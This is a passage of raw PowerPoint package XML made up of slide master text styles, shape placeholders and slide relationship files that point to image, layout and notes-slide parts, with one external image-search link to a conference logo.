      <a:lvl3pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" defTabSz="912813" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" defTabSz="912813" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" defTabSz="912813" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" defTabSz="912813" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="396875" indent="-396875" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buBlip>
          <a:blip r:embed="rId15"/>
        </a:buBlip>
        <a:defRPr sz="3200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="914400" indent="-396875" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buBlip>
          <a:blip r:embed="rId16"/>
        </a:buBlip>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1258888" indent="-344488" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buBlip>
          <a:blip r:embed="rId16"/>
        </a:buBlip>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1604963" indent="-346075" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buBlip>
          <a:blip r:embed="rId16"/>
        </a:buBlip>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1941513" indent="-336550" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buBlip>
          <a:blip r:embed="rId16"/>
        </a:buBlip>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS"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l="-1000" r="-1000"/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 3" descr="white rectangle.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect b="10452"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1300163"/>
            <a:ext cx="9144000" cy="5557837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="230188"/>
            <a:ext cx="8382000" cy="665162"/>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2052" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="722313" y="1905000"/>
            <a:ext cx="8040687" cy="2108200"/>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Tree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483870" r:id="rId1"/>
  </p:sldLayoutIdLst>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr lang="en-US" sz="4800" kern="1200" spc="-125" dirty="0">
          <a:ln w="3175">
            <a:noFill/>
          </a:ln>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFB9"/>
              </a:gs>
              <a:gs pos="36000">
                <a:srgbClr val="FFFF99"/>
              </a:gs>
              <a:gs pos="86000">
                <a:srgbClr val="F6AE1E"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" defTabSz="912813" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" defTabSz="912813" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" defTabSz="912813" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" defTabSz="912813" rtl="0" fontAlgn="base">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:defRPr sz="3000" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="384175" indent="-6350" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:defRPr sz="2800" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="760413" indent="-6350" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:defRPr sz="2400" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1093788" indent="6350" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:defRPr sz="2400" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1425575" indent="403225" algn="l" defTabSz="912813" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:defRPr sz="2400" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Courier New" pitchFamily="49"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 Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><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41.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide19.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.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53.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.jpeg"/><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image" Target="../media/image55.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://images.google.com/imgres?imgurl=http://fond-gouv.qc.ca/103/images/syscan.jpg&amp;imgrefurl=http://fond-gouv.qc.ca/103/index_e.htm&amp;h=739&amp;w=2780&amp;sz=367&amp;hl=en&amp;start=2&amp;um=1&amp;tbnid=6GwiTk3wRVfBhM:&amp;tbnh=40&amp;tbnw=150&amp;prev=/images?q=Syscan&amp;svnum=10&amp;um=1&amp;hl=en" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.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63.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide32.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.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5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide35.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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71.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.wmf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide37.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.wmf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide38.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
